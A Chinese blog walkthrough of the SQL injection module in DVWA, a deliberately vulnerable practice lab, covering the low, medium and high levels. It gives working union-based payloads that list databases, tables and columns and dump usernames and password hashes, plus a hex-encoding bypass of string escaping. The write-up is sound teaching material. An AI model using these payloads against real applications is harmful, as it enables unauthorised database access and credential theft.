DVWA-SQL注入(SQL Injection)低/中/高级别

已于 2024-06-23 18:03:55 修改
阅读量1.4w 收藏 41
点赞数 11
分类专栏: 《靶场实战》 文章标签: 网络安全 渗透测试 web安全 安全
于 2021-08-14 17:34:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/119702519
版权

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

DVWA是一个用来联系渗透的靶场,其中包含数个漏洞模块,本篇博客向大家简单介绍下SQL注入(SQL Injection)模块三个级别(low/medium/high)的通关步骤

SQL Injection-low级别

SQL注入的low级别需要我们输入用户的ID作为参数,后端的SQL语句根据用户ID查询用户的信息并返回,执行SQL之前并没有过滤,源码如下

我们输入一个正确的用户ID : 1 , 发现输入的参数拼接到了url地址栏中,由此推断,此关卡使用的请求方式为GET请求,我们直接在输入框中构造payload即可,查询到的用户信息回显到了页面中,可以尝试联合注入

 接下来测试注入点,输入 1' and true # 使SQL恒成立,页面正常显示了查询到的用户数据,再输入 1' and false # 使SQL恒不成立,页面空显示,即没有查到用户的数据,由此推断出用户输入的参数会影响SQL的语法结构,从而影响SQL的执行结果,即存在SQL注入,并且注入点为单引号字符型注入

 

 

确认注入点以后,我们使用联合注入构造payload,获取所有数据库

-1' union select 1,(select group_concat(schema_name) 
from information_schema.schemata) #

 获取所有表

-1' union select 1,(select group_concat(table_name) 
from information_schema.tables 
where table_schema='dvwa') #

获取所有字段

-1' union select 1,(select group_concat(column_name) 
from information_schema.columns 
where table_schema='dvwa' and table_name='users') #

获取数据

-1' union select 1,(select group_concat(user,password) from dvwa.users) #

SQL Injection-medium中级别

medium级别使用下拉框提交数据,请求方式为POST请求,需要抓包来修改提交的参数

根据输入的用户ID查询用户信息并在页面中回显,有显示位,可以使用联合注入

执行SQL之前,使用mysqli_real_escape_string()函数转译了特殊字符,可以使用Hex()编译绕过,源码如下

使用抓包软件拦截POST请求,修改参数,使用联合注入构造payload,获取所有数据库

-1 union select 1,(select group_concat(schema_name) 
from information_schema.schemata) -- a

使用MySQL的Hex函数编译需要查询的表名,并在结果前面加上0x,从而绕过特殊字符转译,获取表

mysql> select Hex('dvwa');

-1 union select 1,(select group_concat(table_name) 
from information_schema.tables 
where table_schema=0x64767761) -- a

将表名也使用MySQL的Hex()转译,获取所有字段

 注意:post请求的内容中不要换行

-1 union select 1,(select group_concat(column_name) 
from information_schema.columns 
where table_schema=0x64767761 and table_name=0x7573657273) -- a

SQL Injection-hign高级别

hign级别将参数保存到session中,在输入框直接构造payload即可

后端代码从session中获取用户输入的参数,并根据用户ID获取用户信息并回显到页面中,有回显,可以使用联合注入,并且执行SQL之前没有对用户输入的参数进行过滤,源码如下

 

获取数据库

-1' union select 1,(select group_concat(schema_name) 
from information_schema.schemata) #

获取表

-1' union select 1,(select group_concat(table_name) 
from information_schema.tables 
where table_schema='dvwa') #

获取字段

-1' union select 1,(select group_concat(column_name) 
from information_schema.columns 
where table_schema='dvwa' and table_name='users') #

士别三日wyx
关注
  • 11
    点赞
  • 41
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DVWA-SQL注入
WY92139010的博客
05-03 949
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库的表 6.获取表的字段名 7.得到数据 三、DVWA注入分...
DVWA-SQL InjectionSQL 注入)
weixin_50342860的博客
08-28 327
目录风险lowmediumhigh修复扩展 风险 是在数据交互,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限沦陷)。 手工注入常规思路 判断是否存在注入,注入是字符型还是数字型 猜解SQL查询语句的字段数 确定回显位置 获取当前数据库 获取数据库的表 获取表的字段名 得到数据 low 分析源码,可以看到对前端传入的参数id没有做任何的过滤,明显存在手工注入,直接带入数
DVWA--SQL Injection(非盲注)--四个级别
1stPeak's Blog
10-29 1020
SQL 注入,是指攻击者通过注入恶意的SQL 命令,破坏SQL 查询语句的结构,从而达到执行恶意SQL 语句的目的。SQL 注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤“。尽管如此,SQL 注入仍是现在最常见的Web 漏洞之一 这里DVWASQL Injection(非盲注)共有四个等级 索引目录: Low Medium High Impossible ...
网络安全-靶机dvwasql注入Low到High详解(含代码分析)_dvwa sql注入低中代码分析(1)
2401_84253132的博客
04-29 939
这样的话估计不能使用Error注入。结论:字段为2。
DVWASQL注入LOW与Medium
ANDTM的博客
04-10 790
这里我们重点看前几行代码,大概意思就是当我们呈递的东西不为空是,就会把我们呈递的东西赋值给id(代码蓝色的),此时右边的id(代码红色的,即加引号的)就是我们输入的东西,没有任何的过滤机制。而在数据库执行时,如select email from member where id=$id,其 $id 为 我们输入的值 ,如果 输入 1 or 1=1 ,则变成select email from member where id=1 or 1=1 ,SQL注入大概就是这个原理。
关于DVWA靶场SQL Injection(low,medium,high)代码分析及注入分析
qq_22792465的博客
06-10 410
下图为源码提交表单action='#'的作用是将数据提交到当前页面。
DVWASQL注入低中级)
qq_43455259的博客
01-20 4784
dvwasql注入
DVWA--SQL注入(SQL Injection)--HIgh
JakeLin's Blog
06-16 389
DVWA--SQL注入(SQL Injection)--Low DVWA--SQL注入(SQL Injection)--Medium 级别:High 实际和Low级别一样,进行SQL注入,参考Low 后台源码 <?php if( isset( $_SESSION [ 'id' ] ) ) { // Get input $id = $_SESSION[ 'id' ]; // Check database $query = "SELECT ..
DVWA-master.zip
03-13
1. SQL注入SQL Injection):这是Web应用最常见的一种安全漏洞,允许攻击者通过构造恶意的SQL语句来获取、修改或删除数据库的数据。在DVWA,你可以学习如何识别SQL注入点,以及如何利用它们执行任意的SQL...
软件安全实验2 SQL注入实验
最新发布
06-19
DVWA目前的版本共有十个漏洞模块,分别是Brute Force(暴力破解)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的...
网络安全-实验六-SQL注入-基本手工注入.docx
11-10
DVWASQL Injection模块,我们可以通过在输入框插入SQL查询,如`' UNION SELECT DATABASE(),1,1 -- `,来绕过应用程序的正常查询并获取MySQL数据库的名称。这将合并到原始查询,返回当前数据库和其他两个...
网络安全-靶机dvwasql注入Low到High详解(含代码分析
热门推荐
关注网络安全、云原生安全
10-11 2万+
目录 SQL Injection-LOW Union注入 注入点判断 字段判断 获取数据库名 获取表名 获取列名 获取数据 Error注入 获取表名 获取列名 获取数据 源码解析 主要步骤 漏洞原因 SQL Injection-MIDDLE SQL Injection-HIGH SQL Injection(Blind)-LOW Boolean盲注 获取数据库名 sqlmap 获取数据库名 获取表名 获取列名 获取数据 SQL Injection(Blin.
DVWA--sql手工注入(级)
firecjh的博客
06-09 1033
前端页面设置了下拉选择表单,以此来控制用户的输入。模块对‘users’进行编码。
DVWA--sql手工注入(级)
firecjh的博客
06-09 547
实验环境:配置DVWA平台。进入DVWA平台,选择,将安全级别设置为High。点击,进入测试页面。2.判断列数。3.判断显错点。4.获取数据库名。5.获取表名。6.获取列名。7)获取数据。
DVWASQL注入
qq_46416934的博客
07-29 1234
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWA综合靶场练习:SQL injection-低中
流浪法师的博客
05-26 215
DVWA综合靶场练习:SQL injection-低中
DVWA sql注入(低中)
m0_73581247的博客
04-08 427
这样我们就能得到和上面初级一样的内容,接下来的和初级类似。因为这里对一些字符进行了转义,需要使用HEX进行转义。都说手动注入烦,直接sqlmap一把梭哈。偶然发现sqlmap还有解密功能。这里我感觉和第一关差不多。太简单了,只给出代码。我就不抓了直接给代码
DVWA_SQL注入低中等级讲解
Keiltest的博客
08-10 1035
本章讲解了sql注入
dvwa sql injection
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境。其之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值